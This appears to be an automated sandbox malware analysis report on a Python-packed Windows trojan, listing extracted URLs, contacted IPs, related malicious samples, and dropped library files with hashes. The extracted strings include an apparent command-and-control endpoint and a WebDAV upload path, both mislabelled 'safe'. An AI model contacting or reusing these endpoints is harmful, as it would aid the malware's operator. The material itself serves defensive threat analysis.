      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syclient1.exe, 00000002.00000003.1465728144.000001692C709000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1466854228.000001692C709000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1471415816.000001692C718000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474743784.000001692E30A000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1467193947.000001692C709000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1471313853.000001692E345000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1473877269.000001692E306000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690005543.000001692C6A4000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1471112667.000001692E302000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://www.python.org/psf/license/client1.exe, 00000002.00000002.2693881322.00007FFBAAC69000.00000004.00000001.01000000.00000004.sdmp, python311.dll.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://bugs.python.org/issue42195.client1.exe, 00000002.00000003.1475900957.000001692EA62000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://img.shields.io/pypi/v/cryptography.svgclient1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      http://google.com/mail/client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://146.70.87.211:5000/clients/996/commands0client1.exe, 00000002.00000002.2692478911.000001692F1D8000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://wwwsearch.sf.net/):client1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1476629113.000001692EA76000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1476531637.000001692EAF7000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://tools.ietf.org/html/rfc6125#section-6.4.3client1.exe, 00000002.00000003.1474438475.000001692EA1A000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2692163665.000001692ED70000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1476180999.000001692EA1A000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475306605.000001692EA1A000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://cryptography.io/en/latest/security/client1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://cffi.readthedocs.io/en/latest/using.html#callbacks_cffi_backend.cp311-win_amd64.pyd.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      http://timelessrepo.com/json-isnt-a-javascript-subset).client1.exe, 00000002.00000003.1492430826.000001692E9A0000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1490021995.000001692E9A0000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1476584183.000001692EAAF000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2691501664.000001692E9A0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://www.openssl.org/Hclient1.exe, 00000000.00000003.1453344762.00000262AABD5000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2695346488.00007FFBAB1C6000.00000002.00000001.01000000.0000000F.sdmp, client1.exe, 00000002.00000002.2695939389.00007FFBAB65B000.00000002.00000001.01000000.0000000E.sdmp, libssl-1_1.dll.0.drfalse
      • URL Reputation: safe
      		unknown
      https://docs.python.org/3/library/socket.html#socket.socket.connect_exclient1.exe, 00000002.00000002.2692478911.000001692F154000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyclient1.exe, 00000002.00000003.1471112667.000001692E302000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmclient1.exe, 00000002.00000003.1473810890.000001692E3A3000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacyclient1.exe, 00000002.00000002.2692478911.000001692F100000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://146.70.87.211:5000bjectclient1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://cryptography.ioclient1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://github.com/pyca/cryptography/issuesMETADATA.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://readthedocs.org/projects/cryptography/badge/?version=latestclient1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings.client1.exe, 00000002.00000002.2691134197.000001692E750000.00000004.00001000.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://google.com/mailclient1.exe, 00000002.00000002.2690470308.000001692E300000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E5C2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://peps.python.org/pep-0263/client1.exe, 00000002.00000002.2693682237.00007FFBAABCC000.00000002.00000001.01000000.00000004.sdmp, python311.dll.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://pypi.org/project/cryptography/client1.exe, 00000000.00000003.1457707874.00000262AABD9000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.client1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://nextcl.online/remote.php/dav/files/root/client1.exe, 00000002.00000002.2690716906.000001692E400000.00000004.00001000.00020000.00000000.sdmp, client1.exe, 00000002.00000002.2690809690.000001692E508000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1475247941.000001692E564000.00000004.00000020.00020000.00000000.sdmp, client1.exe, 00000002.00000003.1474501548.000001692E55D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      146.70.87.211
      		unknownUnited Kingdom
      		2018TENET-1ZAfalse
      172.67.168.106
      		ifconfig.coUnited States
      		13335CLOUDFLARENETUSfalse

      Private

      IP
      127.0.0.1

      General Information

      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1548293
      Start date and time:2024-11-04 09:48:14 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 8m 4s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:12
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:client1.exe
      Detection:MAL
      Classification:mal56.troj.evad.winEXE@11/33@1/3
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:Failed
      Cookbook Comments:
      • Found application associated with file extension: .exe

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing disassembly code.
      • VT rate limit hit for: client1.exe

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      146.70.87.211Firefoxw.png.exeGet hashmaliciousUnknownBrowse
        FileDoc2.png.exeGet hashmaliciousUnknownBrowse
          172.67.168.106https://docs.google.com/presentation/d/e/2PACX-1vTDYiKRA4Xpi87V1ueZYWLPwiU1D7IimpaLgw9IwC2WOcZVcxEAqv83v8l-qPScyrAJ2_Ln7kd6oD0B/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ifconfig.copython-3.12.1-amd64[1].exeGet hashmaliciousUnknownBrowse
            • 172.64.203.2
            A8jtAAVtzW.exeGet hashmaliciousContiBrowse
            • 172.64.163.15
            A8jtAAVtzW.exeGet hashmaliciousContiBrowse
            • 172.64.162.15
            apache2Get hashmaliciousFritzFrogBrowse
            • 188.114.97.7
            ncGet hashmaliciousFritzFrogBrowse
            • 188.114.97.7

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            TENET-1ZAFirefoxw.png.exeGet hashmaliciousUnknownBrowse
            • 146.70.87.211
            FileDoc2.png.exeGet hashmaliciousUnknownBrowse
            • 146.70.87.211
            ppc.elfGet hashmaliciousMiraiBrowse
            • 146.232.183.240
            jew.x86.elfGet hashmaliciousMiraiBrowse
            • 146.68.57.73
            ppc.elfGet hashmaliciousUnknownBrowse
            • 155.233.21.8
            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
            • 152.116.161.28
            la.bot.sh4.elfGet hashmaliciousMiraiBrowse
            • 163.200.222.201
            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
            • 143.128.168.115
            arm.elfGet hashmaliciousUnknownBrowse
            • 146.237.40.244
            nklx86.elfGet hashmaliciousUnknownBrowse
            • 154.114.95.172
            CLOUDFLARENETUShttps://www.supercontable.es/emailing/track_superc.php?Destino=!:%7D%7D%7C.fasttravelnet.xyz/YW5kcmVzLnRvcmliaW9AY2VsbG5leHRlbGVjb20uY29t&IdTracking=9008&user=000000Get hashmaliciousPhisherBrowse
            • 104.17.25.14
            B6EGeOHEFm.exeGet hashmaliciousPhemedrone StealerBrowse
            • 104.26.1.100
            Q60ZbERXWZ.exeGet hashmaliciousPhemedrone StealerBrowse
            • 104.26.1.100
            nuVM6HVKRG.exeGet hashmaliciousPhemedrone StealerBrowse
            • 104.26.1.100
            XCubQJqiz7.exeGet hashmaliciousPhemedrone StealerBrowse
            • 104.26.1.100
            upd.ps1Get hashmaliciousPhemedrone StealerBrowse
            • 172.67.70.233
            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
            • 188.114.96.3
            WDSecureUtil.exeGet hashmaliciousPhemedrone StealerBrowse
            • 104.26.1.100
            DBp7mBJwqD.exeGet hashmaliciousPhemedrone StealerBrowse
            • 172.67.70.233
            EROctober 31, 2024_Amendment_for_J.thepautIyNURVhUTlVNUkFORE9NMTkjIw==-1.htmlGet hashmaliciousUnknownBrowse
            • 104.21.55.69

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\_MEI40522\VCRUNTIME140.dllqbE2mhhzCq.exeGet hashmaliciousBlank GrabberBrowse
              UwOcZADSmi.exeGet hashmaliciousAsyncRATBrowse
                IyWKJMlCXg.exeGet hashmaliciousXWormBrowse
                  SecuriteInfo.com.Python.Stealer.1545.20368.28754.exeGet hashmaliciousPython Stealer, CStealerBrowse
                    JdHvcxG4Up.exeGet hashmaliciousUnknownBrowse
                      souFnS89FP.exeGet hashmaliciousUnknownBrowse
                        Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                          enigma.tech.exeGet hashmaliciousBlank GrabberBrowse
                            LicenseManagerWamp.exeGet hashmaliciousUnknownBrowse
                              VXLauncher.exeGet hashmaliciousEmpyrean, Discord Token StealerBrowse
                                C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pydSecuriteInfo.com.Python.Stealer.1251.9496.6786.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                  SecuriteInfo.com.Python.Stealer.1251.9496.6786.exeGet hashmaliciousPython Stealer, BLX Stealer, XLABB GrabberBrowse
                                    UyvVIyj7Ga.exeGet hashmaliciousUnknownBrowse
                                      https://github.com/AccentuSoft/LinkScope_Client/releases/download/v1.6.2/LinkScope_Installer.exeGet hashmaliciousUnknownBrowse
                                        Wetransfer.exeGet hashmaliciousPython StealerBrowse
                                          erg.exeGet hashmaliciousUnknownBrowse
                                            erg.exeGet hashmaliciousTrap StealerBrowse
                                              Mupid_project.xlsGet hashmaliciousUnknownBrowse
                                                yXLOWtfvSd.exeGet hashmaliciousUnknownBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\VCRUNTIME140.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):109392
                                                  Entropy (8bit):6.643764685776923
                                                  Encrypted:false
                                                  SSDEEP:1536:DcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/Auecbq8qZU34zW/K0zD:DV3iC0h9q4v6XjKAuecbq8qGISb/
                                                  MD5:870FEA4E961E2FBD00110D3783E529BE
                                                  SHA1:A948E65C6F73D7DA4FFDE4E8533C098A00CC7311
                                                  SHA-256:76FDB83FDE238226B5BEBAF3392EE562E2CB7CA8D3EF75983BF5F9D6C7119644
                                                  SHA-512:0B636A3CDEFA343EB4CB228B391BB657B5B4C20DF62889CD1BE44C7BEE94FFAD6EC82DC4DB79949EDEF576BFF57867E0D084E0A597BF7BF5C8E4ED1268477E88
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: qbE2mhhzCq.exe, Detection: malicious, Browse
                                                  • Filename: UwOcZADSmi.exe, Detection: malicious, Browse
                                                  • Filename: IyWKJMlCXg.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Python.Stealer.1545.20368.28754.exe, Detection: malicious, Browse
                                                  • Filename: JdHvcxG4Up.exe, Detection: malicious, Browse
                                                  • Filename: souFnS89FP.exe, Detection: malicious, Browse
                                                  • Filename: Bootstrapper V1.19.exe, Detection: malicious, Browse
                                                  • Filename: enigma.tech.exe, Detection: malicious, Browse
                                                  • Filename: LicenseManagerWamp.exe, Detection: malicious, Browse
                                                  • Filename: VXLauncher.exe, Detection: malicious, Browse
                                                  Reputation:moderate, very likely benign file
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d.....y..........." ...".....`.......................................................5....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_brotli.cp311-win_amd64.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):820736
                                                  Entropy (8bit):6.056263694016779
                                                  Encrypted:false
                                                  SSDEEP:12288:cY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfR7o:cp0NA1tAmZfR
                                                  MD5:D9FC15CAF72E5D7F9A09B675E309F71D
                                                  SHA1:CD2B2465C04C713BC58D1C5DE5F8A2E13F900234
                                                  SHA-256:1FCD75B03673904D9471EC03C0EF26978D25135A2026020E679174BDEF976DCF
                                                  SHA-512:84F705D52BD3E50AC412C8DE4086C18100EAC33E716954FBCB3519F4225BE1F4E1C3643D5A777C76F7112FAE30CE428E0CE4C05180A52842DACB1F5514460006
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: SecuriteInfo.com.Python.Stealer.1251.9496.6786.exe, Detection: malicious, Browse
                                                  • Filename: SecuriteInfo.com.Python.Stealer.1251.9496.6786.exe, Detection: malicious, Browse
                                                  • Filename: UyvVIyj7Ga.exe, Detection: malicious, Browse
                                                  • Filename: , Detection: malicious, Browse
                                                  • Filename: Wetransfer.exe, Detection: malicious, Browse
                                                  • Filename: erg.exe, Detection: malicious, Browse
                                                  • Filename: erg.exe, Detection: malicious, Browse
                                                  • Filename: Mupid_project.xls, Detection: malicious, Browse
                                                  • Filename: yXLOWtfvSd.exe, Detection: malicious, Browse
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ls...........u......q......u......q......q......q.....Yq...........Hp.....Hp.....Hp.....Hp.....Rich............................PE..d......d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_bz2.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):84760
                                                  Entropy (8bit):6.570256456635448
                                                  Encrypted:false
                                                  SSDEEP:1536:0RdQz7pZ3catNZTRGE51LOBK5bkb8BsfYqJIJCVM7SyTjPxL:0/Qz9Z5VOwkIBsAqJIJCVM9x
                                                  MD5:A8A37BA5E81D967433809BF14D34E81D
                                                  SHA1:E4D9265449950B5C5A665E8163F7DDA2BADD5C41
                                                  SHA-256:50E21CE62F8D9BAB92F6A7E9B39A86406C32D2DF18408BB52FFB3D245C644C7B
                                                  SHA-512:B50F4334ACB54A6FBA776FC77CA07DE4940810DA4378468B3CA6F35D69C45121FF17E1F9C236752686D2E269BD0B7BCE31D16506D3896B9328671049857ED979
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u............l`.....h......h......h......h......h.....bh......l............bh.....bh.....bh.....bh.....Rich....................PE..d......c.........." ...".....^......L........................................P............`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_cffi_backend.cp311-win_amd64.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):181760
                                                  Entropy (8bit):6.176962076839488
                                                  Encrypted:false
                                                  SSDEEP:3072:jm3K87nKna75PQrBjfFKYG50nzkL+CrXfU+PS7KiSTLkKKYYg4UO:jmb7Ma7KdFKEnOrXf7biSTLLIXUO
                                                  MD5:FDE9A1D6590026A13E81712CD2F23522
                                                  SHA1:CA99A48CAEA0DBACCF4485AFD959581F014277ED
                                                  SHA-256:16ECCC4BAF6CF4AB72ACD53C72A1F2B04D952E07E385E9050A933E78074A7D5B
                                                  SHA-512:A522661F5C3EEEA89A39DF8BBB4D23E6428C337AAC1D231D32B39005EA8810FCE26AF18454586E0E94E51EA4AC0E034C88652C1C09B1ED588AEAC461766981F4
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......._......C...C...C..NC...CI..B...C}. C...CI..B...CI..B...CI..B...C..B...Cz..B...C...C...C..B...C..HC...C..B...C."C...C..B...CRich...C........................PE..d...m.b.........." .........B..............................................0............`..........................................g..l....g..................<............ .......M...............................M..8............................................text...x........................... ..`.rdata..............................@..@.data....\.......0...x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_ctypes.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):123664
                                                  Entropy (8bit):6.05786871255428
                                                  Encrypted:false
                                                  SSDEEP:3072:L7u5LnIx1If3yJdZfLIUAYX5BO89IJLPSVxr:LwxfijZfLIU9BO8f
                                                  MD5:496DCF8821FFC12F476878775999A8F3
                                                  SHA1:6B89B8FDD7CD610C08E28C3A14B34F751580CFFD
                                                  SHA-256:B59E103F8EC6C1190DED21EEF27BEA01579220909C3968EEEC37D46D2ED39E80
                                                  SHA-512:07118F44B83D58F333BC4B853E9BE66DFFB3F7DB8E65E0226975297BF5794EBDAA2C7A51EF84971FAF4D4233A68A6B5E9AC02E737D16C0AC19A6CF65FAD9443F
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........z..N...N...N...Gc..H....g..L....g..B....g..F....g..J....g..L....c..O....c..H....`..M...N........g..H....g..O....gv.O....g..O...RichN...........................PE..d....~.c.........." ..."............p\..............................................X.....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_decimal.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):253712
                                                  Entropy (8bit):6.5494308842214055
                                                  Encrypted:false
                                                  SSDEEP:6144:81/80zC2Ej7n9Is3yVKFoob4Q48dl2r89qWM53pLW1AsUtIFcb:czC2c7nUVKFd40Cdi8icb
                                                  MD5:5E8AA9CD4742A51ACC5B2155770241D5
                                                  SHA1:AF030327EA6702A081DE422168D812263F581470
                                                  SHA-256:59FEE7A8D0A85ED98BBF5DFB7A0AD64B60CBE88427EFD98B3C9FAAD3E4421A87
                                                  SHA-512:E751621902897DB7274B481386A811D2AABB63AA67759107C2F61BF29AFC5437E7F5892158C83810DD5B5B498D160E308E6ED6453102D9BB58FC8F7DABF58697
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}RT...T...T...]...Z.......V.......Y.......\.......P.......W.......V...T..........U.......[.......U.......U.......U...RichT...................PE..d....~.c.........." ...".x...<............................................................`..........................................T..P...`T...................&......./......P.......T...........................@...@............................................text...5v.......x.................. ..`.rdata..<............|..............@..@.data....*...p...$...T..............@....pdata...&.......(...x..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_hashlib.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):65296
                                                  Entropy (8bit):6.219900689625999
                                                  Encrypted:false
                                                  SSDEEP:1536:H8njpnxGkYNEUsZE/0Cw6cG1BIJOILis7SydPxPK:cnjpnxbZyw6t1BIJOILNTxC
                                                  MD5:1C88B53C50B5F2BB687B554A2FC7685D
                                                  SHA1:BFE6FDB8377498BBEFCAAD1E6B8805473A4CCBF3
                                                  SHA-256:19DD3B5EBB840885543974A4CB6C8EA4539D76E3672BE0F390A3A82443391778
                                                  SHA-512:A312B11C85AAA325AB801C728397D5C7049B55FA00F24D30F32BF5CC0AD160678B40F354D9D5EC34384634950B5D6EDA601E21934C929B4BC7F6EF50F16E3F59
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g....2..g.......g.......g.......g.......g..g....g.......g.......g...g..!g..g....g..g....g..g.^..g..g....g..Rich.g..........................PE..d......c.........." ...".T...~......@?...............................................}....`.............................................P......................,......../......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_lzma.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):158992
                                                  Entropy (8bit):6.848358141260959
                                                  Encrypted:false
                                                  SSDEEP:3072:jlirS97HrdVmEkGCm5hRznf49mNo2wOvJ02JIJZ1G0qf1xPD:jlirG0EkTuAYO2wQ35j
                                                  MD5:BC07D7AC5FDC92DB1E23395FDE3420F2
                                                  SHA1:E89479381BEEBA40992D8EB306850977D3B95806
                                                  SHA-256:AB822F7E846D4388B6F435D788A028942096BA1344297E0B7005C9D50814981B
                                                  SHA-512:B6105333BB15E65AFEA3CF976B3C2A8A4C0EBB09CE9A7898A94C41669E666CCFA7DC14106992502ABF62F1DEB057E926E1FD3368F2A2817BBF6845EADA80803D
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.*C#.D.#.D.#.D.*...'.D.l.E.!.D.l.A./.D.l.@.+.D.l.G. .D...E. .D.h.E.!.D.#.E.E.D...I...D...D.".D....".D...F.".D.Rich#.D.................PE..d......c.........." ...".b...........5...............................................Z....`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text....a.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B........................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_queue.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32528
                                                  Entropy (8bit):6.447771962486264
                                                  Encrypted:false
                                                  SSDEEP:768:z+yF66rXlmk599IJQU55YiSyvpKHPxWEx7M:z+wnXlP599IJQUn7SyhKHPxDM
                                                  MD5:E0CC8C12F0B289EA87C436403BC357C1
                                                  SHA1:E342A4A600EF9358B3072041E66F66096FAE4DA4
                                                  SHA-256:9517689D7D97816DEE9E6C01FFD35844A3AF6CDE3FF98F3A709D52157B1ABE03
                                                  SHA-512:4D93F23DB10E8640CD33E860241E7EA6A533DAF64C36C4184844E6CCA7B9F4BD41DB007164A549E30F5AA9F983345318FF02D72815D51271F38C2E8750DF4D77
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._XF.1.F.1.F.1.O...D.1...0.D.1...4.J.1...5.N.1...2.E.1...0.E.1...0.D.1.F.0...1...<.G.1...1.G.1.....G.1...3.G.1.RichF.1.........PE..d....~.c.........." ...".....8......................................................|.....`..........................................C..L....C..d....p.......`.......P.../..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\_MEI40522\_socket.pyd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\client1.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):79632
                                                  Entropy (8bit):6.283530859751833
                                                  Encrypted:false
